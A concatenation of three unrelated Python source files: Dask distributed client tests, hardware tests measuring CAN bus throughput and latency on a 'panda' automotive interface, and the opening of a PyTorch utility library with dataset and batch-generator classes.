("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources_culled(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((2, 2, 2), chunks=1)
with dask.annotate(resources={"GPU": 1}):
y = x.map_blocks(lambda x0: x0, meta=x._meta)
z = y[0, 0, 0]
(z,) = c.compute([z], optimize_graph=False)
await z
# it worked!
@gen_cluster(client=True)
async def test_annotations_loose_restrictions(c, s, a, b):
da = pytest.importorskip("dask.array")
# Eventually fails if allow_other_workers=False
with dask.annotate(workers=["fake"], allow_other_workers=True):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(not ts.worker_restrictions for ts in s.tasks.values())
assert all({"fake"} == ts.host_restrictions for ts in s.tasks.values())
assert all(
[
{"workers": ("fake",), "allow_other_workers": True} == ts.annotations
for ts in s.tasks.values()
]
)
@gen_cluster(client=True)
async def test_workers_collection_restriction(c, s, a, b):
da = pytest.importorskip("dask.array")
future = c.compute(da.arange(10), workers=a.address)
await future
assert a.data and not b.data
@gen_cluster(client=True, nthreads=[("127.0.0.1", 0)])
async def test_get_client_functions_spawn_clusters(c, s, a):
# see gh4565
scheduler_addr = c.scheduler.address
def f(x):
with LocalCluster(
n_workers=1,
processes=False,
dashboard_address=":0",
worker_dashboard_address=":0",
) as cluster2:
with Client(cluster2) as c1:
c2 = get_client()
c1_scheduler = c1.scheduler.address
c2_scheduler = c2.scheduler.address
assert c1_scheduler != c2_scheduler
assert c2_scheduler == scheduler_addr
await c.gather(c.map(f, range(2)))
await a.close()
c_default = default_client()
assert c is c_default
def test_computation_code_walk_frames():
test_function_code = inspect.getsource(test_computation_code_walk_frames)
code = Client._get_computation_code()
assert test_function_code == code
def nested_call():
return Client._get_computation_code()
assert nested_call() == inspect.getsource(nested_call)
with pytest.raises(TypeError, match="Ignored modules must be a list"):
with dask.config.set(
{"distributed.diagnostics.computations.ignore-modules": "test_client"}
):
code = Client._get_computation_code()
with dask.config.set(
{"distributed.diagnostics.computations.ignore-modules": ["test_client"]}
):
import sys
upper_frame_code = inspect.getsource(sys._getframe(1))
code = Client._get_computation_code()
assert code == upper_frame_code
assert nested_call() == upper_frame_code
def test_computation_object_code_dask_compute(client):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().compute()
y = future
test_function_code = inspect.getsource(test_computation_object_code_dask_compute)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == test_function_code
def test_computation_object_code_not_available(client):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
df = pd.DataFrame({"a": range(10)})
ddf = dd.from_pandas(df, npartitions=3)
result = np.where(ddf.a > 4)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == "<Code not available>"
@gen_cluster(client=True)
async def test_computation_object_code_dask_persist(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().persist()
await future
test_function_code = inspect.getsource(
test_computation_object_code_dask_persist.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_simple(c, s, a, b):
def func(x):
return x
fut = c.submit(func, 1)
await fut
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_simple.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_list_comp(c, s, a, b):
def func(x):
return x
futs = [c.submit(func, x) for x in range(10)]
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_list_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_dict_comp(c, s, a, b):
def func(x):
return x
futs = {x: c.submit(func, x) for x in range(10)}
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_dict_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_map(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_map.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_compute(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_compute.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True, Worker=Nanny)
async def test_upload_directory(c, s, a, b, tmp_path):
from dask.distributed import UploadDirectory
# Be sure to exclude code coverage reports
files_start = {f for f in os.listdir() if not f.startswith(".coverage")}
with open(tmp_path / "foo.py", "w") as f:
f.write("x = 123")
with open(tmp_path / "bar.py", "w") as f:
f.write("from foo import x")
plugin = UploadDirectory(tmp_path, restart=True, update_path=True)
await c.register_worker_plugin(plugin)
[name] = a.plugins
assert os.path.split(tmp_path)[-1] in name
def f():
import bar
return bar.x
results = await c.run(f)
assert results[a.worker_address] == 123
assert results[b.worker_address] == 123
async with Nanny(s.address, local_directory=tmp_path / "foo", name="foo") as n:
results = await c.run(f)
assert results[n.worker_address] == 123
files_end = {f for f in os.listdir() if not f.startswith(".coverage")}
assert files_start == files_end # no change
@gen_cluster(client=True)
async def test_exception_text(c, s, a, b):
def bad(x):
raise Exception(x)
future = c.submit(bad, 123)
await wait(future)
ts = s.tasks[future.key]
assert isinstance(ts.exception_text, str)
assert "123" in ts.exception_text
assert "Exception(x)" in ts.traceback_text
assert "bad" in ts.traceback_text
@gen_cluster(client=True)
async def test_async_task(c, s, a, b):
async def f(x):
return x + 1
future = c.submit(f, 10)
result = await future
assert result == 11
@gen_cluster(client=True)
async def test_async_task_with_partial(c, s, a, b):
async def f(x, y):
return x + y + 1
future = c.submit(functools.partial(f, 1), 10)
result = await future
assert result == 12
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_subscribe_topic(c, s, a):
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"important": "event"})
while len(log) != 1:
await asyncio.sleep(0.01)
time_, msg = log[0]
assert isinstance(time_, float)
assert msg == {"important": "event"}
c.unsubscribe_topic("test-topic")
while s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"forget": "me"})
while len(s.events["test-topic"]) == 1:
await asyncio.sleep(0.01)
assert len(log) == 1
async def async_user_event_handler(event):
log.append(event)
await asyncio.sleep(0)
c.subscribe_topic("test-topic", async_user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"async": "event"})
while len(log) == 1:
await asyncio.sleep(0.01)
assert len(log) == 2
time_, msg = log[1]
assert isinstance(time_, float)
assert msg == {"async": "event"}
# Even though the middle event was not subscribed to, the scheduler still
# knows about all and we can retrieve them
all_events = await c.get_events(topic="test-topic")
assert len(all_events) == 3
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_subscribe_topic_cancelled(c, s, a):
event_handler_started = asyncio.Event()
exc_info = None
async def user_event_handler(event):
nonlocal exc_info
c.unsubscribe_topic("test-topic")
event_handler_started.set()
with pytest.raises(asyncio.CancelledError) as exc_info:
await asyncio.sleep(0.5)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {})
await event_handler_started.wait()
await c._close(fast=True)
assert exc_info is not None
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_all_servers_use_same_channel(c, s, a):
"""Ensure that logs from all server types (scheduler, worker, nanny)
and the clients themselves arrive"""
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
async with Nanny(s.address) as n:
a.log_event("test-topic", "worker")
n.log_event("test-topic", "nanny")
s.log_event("test-topic", "scheduler")
await c.log_event("test-topic", "client")
while not len(log) == 4 == len(set(log)):
await asyncio.sleep(0.1)
@gen_cluster(client=True, nthreads=[])
async def test_events_unsubscribe_raises_if_unknown(c, s):
with pytest.raises(ValueError, match="No event handler known for topic unknown"):
c.unsubscribe_topic("unknown")
@gen_cluster(client=True)
async def test_log_event_warn(c, s, a, b):
def foo():
get_worker().log_event(["foo", "warn"], "Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True)
async def test_log_event_warn_dask_warns(c, s, a, b):
from dask.distributed import warn
def foo():
warn("Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True, Worker=Nanny)
async def test_print(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print("Hello!", 123, sep=":")
await c.submit(foo)
out, err = capsys.readouterr()
assert "Hello!:123" in out
@gen_cluster(client=True, Worker=Nanny)
async def test_print_non_msgpack_serializable(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print(object())
await c.submit(foo)
out, err = capsys.readouterr()
assert "<object object at" in out
def test_print_simple(capsys):
from dask.distributed import print
print("Hello!", 123, sep=":")
out, err = capsys.readouterr()
assert "Hello!:123" in out
def _verify_cluster_dump(url, format: str, addresses: set[str]) -> dict:
fsspec = pytest.importorskip("fsspec")
url = str(url)
if format == "msgpack":
import msgpack
url += ".msgpack.gz"
loader = msgpack.unpack
else:
import yaml
url += ".yaml"
loader = yaml.safe_load
with fsspec.open(url, mode="rb", compression="infer") as f:
state = loader(f)
assert isinstance(state, dict)
assert "scheduler" in state
assert "workers" in state
assert "versions" in state
assert state["workers"].keys() == addresses
return state
def test_dump_cluster_state_write_from_scheduler(
c, s, a, b, tmp_path, monkeypatch: pytest.MonkeyPatch
):
monkeypatch.chdir(tmp_path)
scheduler_dir = tmp_path / "scheduler"
scheduler_dir.mkdir()
c.run_on_scheduler(os.chdir, str(scheduler_dir))
c.dump_cluster_state("not-url")
assert (tmp_path / "not-url.msgpack.gz").is_file()
c.dump_cluster_state("file://is-url")
assert (scheduler_dir / "is-url.msgpack.gz").is_file()
c.dump_cluster_state("file://local-explicit", write_from_scheduler=False)
assert (tmp_path / "local-explicit.msgpack.gz").is_file()
c.dump_cluster_state("scheduler-explicit", write_from_scheduler=True)
assert (scheduler_dir / "scheduler-explicit.msgpack.gz").is_file()
@pytest.mark.parametrize("local", [True, False])
@pytest.mark.parametrize("_format", ["msgpack", "yaml"])
def test_dump_cluster_state_sync(c, s, a, b, tmp_path, _format, local):
filename = tmp_path / "foo"
if not local:
pytest.importorskip("fsspec")
# Make it look like an fsspec path
filename = f"file://{filename}"
c.dump_cluster_state(filename, format=_format)
_verify_cluster_dump(filename, _format, {a["address"], b["address"]})
@pytest.mark.parametrize("local", [True, False])
@pytest.mark.parametrize("_format", ["msgpack", "yaml"])
@gen_cluster(client=True)
async def test_dump_cluster_state_async(c, s, a, b, tmp_path, _format, local):
filename = tmp_path / "foo"
if not local:
pytest.importorskip("fsspec")
# Make it look like an fsspec path
filename = f"file://{filename}"
await c.dump_cluster_state(filename, format=_format)
_verify_cluster_dump(filename, _format, {a.address, b.address})
@pytest.mark.parametrize("local", [True, False])
@gen_cluster(client=True)
async def test_dump_cluster_state_json(c, s, a, b, tmp_path, local):
filename = tmp_path / "foo"
if not local:
pytest.importorskip("fsspec")
# Make it look like an fsspec path
filename = f"file://{filename}"
with pytest.raises(ValueError, match="Unsupported format"):
await c.dump_cluster_state(filename, format="json")
@gen_cluster(client=True)
async def test_dump_cluster_state_exclude_default(c, s, a, b, tmp_path):
futs = c.map(inc, range(10))
while len(s.tasks) != len(futs):
await asyncio.sleep(0.01)
excluded_by_default = [
"run_spec",
]
filename = tmp_path / "foo"
await c.dump_cluster_state(
filename=filename,
format="yaml",
)
with open(f"{filename}.yaml") as fd:
state = yaml.safe_load(fd)
assert "workers" in state
assert len(state["workers"]) == len(s.workers)
for worker, worker_dump in state["workers"].items():
for k, task_dump in worker_dump["tasks"].items():
assert not any(blocked in task_dump for blocked in excluded_by_default)
assert k in s.tasks
assert "scheduler" in state
assert "tasks" in state["scheduler"]
tasks = state["scheduler"]["tasks"]
assert len(tasks) == len(futs)
for k, task_dump in tasks.items():
assert not any(blocked in task_dump for blocked in excluded_by_default)
assert k in s.tasks
await c.dump_cluster_state(
filename=filename,
format="yaml",
exclude=(),
)
with open(f"{filename}.yaml") as fd:
state = yaml.safe_load(fd)
assert "workers" in state
assert len(state["workers"]) == len(s.workers)
for worker, worker_dump in state["workers"].items():
for k, task_dump in worker_dump["tasks"].items():
assert all(blocked in task_dump for blocked in excluded_by_default)
assert k in s.tasks
assert "scheduler" in state
assert "tasks" in state["scheduler"]
tasks = state["scheduler"]["tasks"]
assert len(tasks) == len(futs)
for k, task_dump in tasks.items():
assert all(blocked in task_dump for blocked in excluded_by_default)
assert k in s.tasks
class TestClientSecurityLoader:
@contextmanager
def config_loader(self, monkeypatch, loader):
module_name = "totally_fake_module_name_1"
module = types.ModuleType(module_name)
module.loader = loader
with monkeypatch.context() as m:
m.setitem(sys.modules, module_name, module)
with dask.config.set(
{"distributed.client.security-loader": f"{module_name}.loader"}
):
yield
@pytest.mark.asyncio
async def test_security_loader(self, monkeypatch):
security = tls_only_security()
async with Scheduler(
dashboard_address=":0", protocol="tls", security=security
) as scheduler:
def loader(info):
assert info == {"address": scheduler.address}
return security
with self.config_loader(monkeypatch, loader):
async with Client(scheduler.address, asynchronous=True) as client:
assert client.security is security
@pytest.mark.asyncio
async def test_security_loader_ignored_if_explicit_security_provided(
self, monkeypatch
):
security = tls_only_security()
def loader(info):
assert False
async with Scheduler(
dashboard_address=":0", protocol="tls", security=security
) as scheduler:
with self.config_loader(monkeypatch, loader):
async with Client(
scheduler.address, security=security, asynchronous=True
) as client:
assert client.security is security
@pytest.mark.asyncio
async def test_security_loader_ignored_if_returns_none(self, monkeypatch):
"""Test that if a security loader is configured, but it returns `None`,
then the default security configuration is used"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
config = {
"distributed.comm.require-encryption": True,
"distributed.comm.tls.ca-file": ca_file,
"distributed.comm.tls.client.cert": keycert,
"distributed.comm.tls.scheduler.cert": keycert,
"distributed.comm.tls.worker.cert": keycert,
}
def loader(info):
loader.called = True
return None
with dask.config.set(config):
async with Scheduler(dashboard_address=":0", protocol="tls") as scheduler:
# Smoketest to make sure config was picked up (so we're actually testing something)
assert scheduler.security.tls_client_cert
assert scheduler.security.tls_scheduler_cert
with self.config_loader(monkeypatch, loader):
async with Client(scheduler.address, asynchronous=True) as client:
assert (
client.security.tls_client_cert
== scheduler.security.tls_client_cert
)
assert loader.called
@pytest.mark.asyncio
async def test_security_loader_import_failed(self):
security = tls_only_security()
with dask.config.set(
{"distributed.client.security-loader": "totally_fake_module_name_2.loader"}
):
with pytest.raises(ImportError, match="totally_fake_module_name_2.loader"):
async with Client("tls://bad-address:8888", asynchronous=True):
pass
@gen_cluster(client=True, nthreads=[])
async def test_wait_for_workers_updates_info(c, s):
async with Worker(s.address):
await c.wait_for_workers(1)
assert c.scheduler_info()["workers"]
|
4_can_loopback.py
|
import os
import time
import random
import threading
from panda import Panda
from collections import defaultdict
from nose.tools import assert_equal, assert_less, assert_greater
from .helpers import panda_jungle, start_heartbeat_thread, reset_pandas, time_many_sends, test_all_pandas, test_all_gen2_pandas, clear_can_buffers, panda_connect_and_init
# Reset the pandas before running tests
def aaaa_reset_before_tests():
reset_pandas()
@test_all_pandas
@panda_connect_and_init
def test_send_recv(p):
def test(p_send, p_recv):
p_send.set_can_loopback(False)
p_recv.set_can_loopback(False)
p_send.can_send_many([(0x1ba, 0, b"message", 0)] * 2)
time.sleep(0.05)
p_recv.can_recv()
p_send.can_recv()
busses = [0, 1, 2]
for bus in busses:
for speed in [100, 250, 500, 750, 1000]:
p_send.set_can_speed_kbps(bus, speed)
p_recv.set_can_speed_kbps(bus, speed)
time.sleep(0.05)
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
comp_kbps = time_many_sends(p_send, bus, p_recv, two_pandas=True)
saturation_pct = (comp_kbps / speed) * 100.0
assert_greater(saturation_pct, 80)
assert_less(saturation_pct, 100)
print("two pandas bus {}, 100 messages at speed {:4d}, comp speed is {:7.2f}, percent {:6.2f}".format(bus, speed, comp_kbps, saturation_pct))
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_latency(p):
def test(p_send, p_recv):
p_send.set_can_loopback(False)
p_recv.set_can_loopback(False)
p_send.set_can_speed_kbps(0, 100)
p_recv.set_can_speed_kbps(0, 100)
time.sleep(0.05)
p_send.can_send_many([(0x1ba, 0, b"testmsg", 0)] * 10)
time.sleep(0.05)
p_recv.can_recv()
p_send.can_recv()
busses = [0, 1, 2]
for bus in busses:
for speed in [100, 250, 500, 750, 1000]:
p_send.set_can_speed_kbps(bus, speed)
p_recv.set_can_speed_kbps(bus, speed)
time.sleep(0.1)
# clear can buffers
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
latencies = []
comp_kbps_list = []
saturation_pcts = []
num_messages = 100
for i in range(num_messages):
st = time.time()
p_send.can_send(0x1ab, b"message", bus)
r = []
while len(r) < 1 and (time.time() - st) < 5:
r = p_recv.can_recv()
et = time.time()
r_echo = []
while len(r_echo) < 1 and (time.time() - st) < 10:
r_echo = p_send.can_recv()
if len(r) == 0 or len(r_echo) == 0:
print("r: {}, r_echo: {}".format(r, r_echo))
assert_equal(len(r), 1)
assert_equal(len(r_echo), 1)
et = (et - st) * 1000.0
comp_kbps = (1 + 11 + 1 + 1 + 1 + 4 + 8 * 8 + 15 + 1 + 1 + 1 + 7) / et
latency = et - ((1 + 11 + 1 + 1 + 1 + 4 + 8 * 8 + 15 + 1 + 1 + 1 + 7) / speed)
assert_less(latency, 5.0)
saturation_pct = (comp_kbps / speed) * 100.0
latencies.append(latency)
comp_kbps_list.append(comp_kbps)
saturation_pcts.append(saturation_pct)
average_latency = sum(latencies) / num_messages
assert_less(average_latency, 1.0)
average_comp_kbps = sum(comp_kbps_list) / num_messages
average_saturation_pct = sum(saturation_pcts) / num_messages
print("two pandas bus {}, {} message average at speed {:4d}, latency is {:5.3f}ms, comp speed is {:7.2f}, percent {:6.2f}"
.format(bus, num_messages, speed, average_latency, average_comp_kbps, average_saturation_pct))
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_gen2_pandas
@panda_connect_and_init
def test_gen2_loopback(p):
def test(p_send, p_recv, address=None):
for bus in range(4):
obd = False
if bus == 3:
obd = True
bus = 1
# Clear buses
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
# Send a random string
addr = address if address else random.randint(1, 2000)
string = b"test" + os.urandom(4)
p_send.set_obd(obd)
p_recv.set_obd(obd)
time.sleep(0.2)
p_send.can_send(addr, string, bus)
time.sleep(0.2)
content = p_recv.can_recv()
# Check amount of messages
assert len(content) == 1
# Check content
assert content[0][0] == addr and content[0][2] == string
# Check bus
assert content[0][3] == bus
print("Bus:", bus, "address:", addr, "OBD:", obd, "OK")
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
# Test extended frame address with ELM327 mode
p.set_safety_mode(Panda.SAFETY_ELM327)
test(p, panda_jungle, 0x18DB33F1)
test(panda_jungle, p, 0x18DB33F1)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_bulk_write(p):
# The TX buffers on pandas is 0x100 in length.
NUM_MESSAGES_PER_BUS = 10000
def flood_tx(panda):
print('Sending!')
msg = b"\xaa" * 8
packet = []
# start with many messages on a single bus (higher contention for single TX ring buffer)
packet += [[0xaa, None, msg, 0]] * NUM_MESSAGES_PER_BUS
# end with many messages on multiple buses
packet += [[0xaa, None, msg, 0], [0xaa, None, msg, 1], [0xaa, None, msg, 2]] * NUM_MESSAGES_PER_BUS
# Disable timeout
panda.can_send_many(packet, timeout=0)
print(f"Done sending {4 * NUM_MESSAGES_PER_BUS} messages!")
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
# Start transmisson
threading.Thread(target=flood_tx, args=(p,)).start()
# Receive as much as we can in a few second time period
rx = []
old_len = 0
start_time = time.time()
while time.time() - start_time < 5 or len(rx) > old_len:
old_len = len(rx)
rx.extend(panda_jungle.can_recv())
print(f"Received {len(rx)} messages")
# All messages should have been received
if len(rx) != 4 * NUM_MESSAGES_PER_BUS:
raise Exception("Did not receive all messages!")
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_message_integrity(p):
start_heartbeat_thread(p)
clear_can_buffers(p)
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
p.set_can_loopback(True)
n = 250
for i in range(n):
sent_msgs = defaultdict(set)
for _ in range(random.randrange(10)):
to_send = []
for __ in range(random.randrange(100)):
bus = random.randrange(3)
addr = random.randrange(1, 1<<29)
dat = bytes([random.getrandbits(8) for _ in range(random.randrange(1, 9))])
sent_msgs[bus].add((addr, dat))
to_send.append([addr, None, dat, bus])
p.can_send_many(to_send, timeout=0)
start_time = time.time()
while time.time() - start_time < 2 and any(len(sent_msgs[bus]) for bus in range(3)):
recvd = p.can_recv()
for msg in recvd:
if msg[3] >= 128:
k = (msg[0], bytes(msg[2]))
assert k in sent_msgs[msg[3]-128], f"message {k} was never sent on bus {bus}"
sent_msgs[msg[3]-128].discard(k)
# if a set isn't empty, messages got dropped
for bus in range(3):
assert not len(sent_msgs[bus]), f"loop {i}: bus {bus} missing {len(sent_msgs[bus])} messages"
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
print("Got all messages intact")
|
single_script.py
|
# Python standard library modules
import copy
import os
import logging
import threading
import time
import queue
from collections import deque
import warnings
import itertools
from functools import partial
# Third party libraries
import numpy as np
from tqdm import tqdm
try:
import matplotlib
import matplotlib.pyplot as plt
except ImportError:
matplotlib = None
plt = None
# Pytorch
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable # DO NOT REMOVE
print("Using PyTorch version:", torch.__version__)
### UTILS ###
def resettable(f):
"""
Decorator to make a python object resettable. Note that this will
no work with inheritance. To reset an object, simply call its reset
method.
"""
def __init_and_copy__(self, *args, **kwargs):
f(self, *args)
def reset(o=self):
o.__dict__ = o.__original_dict__
o.__original_dict__ = copy.deepcopy(self.__dict__)
self.reset = reset
self.__original_dict__ = copy.deepcopy(self.__dict__)
return __init_and_copy__
def safe_open_dir(dirpath):
if not os.path.isdir(dirpath):
logging.info("Directory %s does not exist, creating it" % dirpath)
os.makedirs(dirpath)
return dirpath
### BACKEND ###
# Define the global backend variables
epsilon = 1e-11
channels_mode = "channels_first"
logging.info(f"PyJet using config: epsilon={epsilon}, channels_mode"
"={channels_mode}")
# Set up the use of cuda if available
use_cuda = torch.cuda.is_available()
def cudaFloatTensor(x):
# Optimization for casting things to cuda tensors
return torch.FloatTensor(x).cuda()
def cudaLongTensor(x):
return torch.LongTensor(x).cuda()
def cudaByteTensor(x):
return torch.ByteTensor(x).cuda()
def cudaZeros(*args):
return torch.zeros(*args).cuda()
def cudaOnes(*args):
return torch.ones(*args).cuda()
def flatten(x):
"""Flattens along axis 0 (# rows in == # rows out)"""
return x.view(x.size(0), -1)
def softmax(x):
# BUG some shape error
# .clamp(epsilon, 1.)
normalized_exp = (x - x.max(1)[0].expand(*x.size())).exp()
return normalized_exp / normalized_exp.sum(1).expand(*x.size())
def batch_sum(x):
"""Sums a tensor long all non-batch dimensions"""
return x.sum(tuple(range(1, x.dim())))
def zero_center(x):
return x - x.mean()
def standardize(x):
std = (x.pow(2).mean() - x.mean().pow(2)).sqrt()
return zero_center(x) / std.expand(*x.size()).clamp(min=epsilon)
def from_numpy(x):
return torch.from_numpy(x).cuda() if use_cuda else torch.from_numpy(x)
def to_numpy(x):
return x.cpu().numpy() if use_cuda else x.numpy()
def arange(start, end=None, step=1, out=None):
if end is None:
x = torch.arange(0, start, step=step, out=out)
else:
x = torch.arange(start, end, step=step, out=out)
return x.cuda() if use_cuda else x
def rand(*sizes, out=None):
x = torch.rand(*sizes, out=out)
return x.cuda() if use_cuda else x
# use_cuda = False
FloatTensor = cudaFloatTensor if use_cuda else torch.FloatTensor
LongTensor = cudaLongTensor if use_cuda else torch.LongTensor
ByteTensor = cudaByteTensor if use_cuda else torch.ByteTensor
Tensor = FloatTensor
# Tensor fillers
zeros = cudaZeros if use_cuda else torch.zeros
ones = cudaOnes if use_cuda else torch.ones
print("PyJet is using " + ("CUDA" if use_cuda else "CPU") + ".")
### DATA ###
# TODO Create a dataset for HDF5 and Torch Tensor
# VERBOSITY = namedtuple(
# 'VERBOSITY', ['QUIET', 'NORMAL', 'VERBOSE', 'DEBUG'])(0, 1, 2, 3)
class Dataset(object):
"""
An abstract container for data designed to be passed to a model.
This container should implement create_batch. It is only necessary
to implement validation_split() if you use this module to split your
data into a train and test set. Same goes for kfold()
# Note:
Though not forced, a Dataset is really a constant object. Once created,
it should not be mutated in any way.
"""
def __init__(self, *args, **kwargs):
# self.verbosity = verbosity
pass
def __len__(self):
"""The length is used downstream by the generator if it is not inf."""
return float('inf')
# def log(self, statement, verbosity):
# if self.verbosity >= verbosity:
# print(statement)
def create_batch(self, *args, **kwargs):
"""
This method creates a batch of data to be sent to a model.
Returns:
A batch in the form of any type that can be cast to torch tensor
by a model (numpy, HDF5, torch tensor, etc.).
"""
raise NotImplementedError()
def flow(self,
steps_per_epoch=None,
batch_size=None,
shuffle=True,
replace=False,
seed=None):
"""
This method creates a generator for the data.
Returns:
A DatasetGenerator with settings determined by inputs to this
method that generates batches made by this dataset
"""
return DatasetGenerator(
self,
steps_per_epoch=steps_per_epoch,
batch_size=batch_size,
shuffle=shuffle,
replace=replace,
seed=seed)
def validation_split(self, split=0.2, **kwargs):
raise NotImplementedError()
def kfold(self, k, **kwargs):
raise NotImplementedError()
class BatchGenerator(object):
"""
An abstarct iterator to create batches for a model.
# Arguments:
steps_per_epoch -- The number of iterations in one epoch (optional)
batch_size -- The number of samples in one batch
"""
def __init__(self, steps_per_epoch=None, batch_size=None):
self.steps_per_epoch = steps_per_epoch
self.batch_size = batch_size
def __iter__(self):
return self
def __next__(self):
raise NotImplementedError()
class DatasetGenerator(BatchGenerator):
"""
An iterator to create batches for a model using a Dataset. 2 of the
following must be defined
-- The input Dataset's length
-- steps_per_epoch
-- batch_size
Also, if the Dataset's length is not defined, its create_batch method
should not take any inputs
# Arguments
dataset -- the dataset to generate from
steps_per_epoch -- The number of iterations in one epoch (optional)
batch_size -- The number of samples in one batch (optional)
shuffle -- Whether or not to shuffle the dataset before each epoch
default: True
replace -- Whether or not to sample with replacement. default: False
seed -- A seed for the random number generator (optional).
"""
def __init__(self,
dataset,
steps_per_epoch=None,
batch_size=None,
shuffle=True,
replace=False,
seed=None):
super(DatasetGenerator, self).__init__(steps_per_epoch, batch_size)
self.dataset = dataset
self.shuffle = shuffle
self.replace = replace
self.seed = seed
self.index_array = None
self.lock = threading.Lock()
# Some input checking
check = (int(self.steps_per_epoch is not None) +
int(self.batch_size is not None) +
int(len(self.dataset) != float("inf")))
if check < 2:
raise ValueError(
"2 of the following must be defined: len(dataset),"
" steps_per_epoch, and batch_size.")
# Otherwise, we're good, infer the missing info
if len(self.dataset) != float('inf'):
self.index_array = np.arange(len(self.dataset))
if self.batch_size is None:
if self.steps_per_epoch is None:
raise ValueError()
self.batch_size = int(
(len(self.dataset) + self.steps_per_epoch - 1) /
self.steps_per_epoch)
if self.steps_per_epoch is None:
self.steps_per_epoch = int(
(len(self.dataset) + self.batch_size - 1) / self.batch_size)
# Set the seed if we have one
if self.seed is not None:
np.random.seed(self.seed)
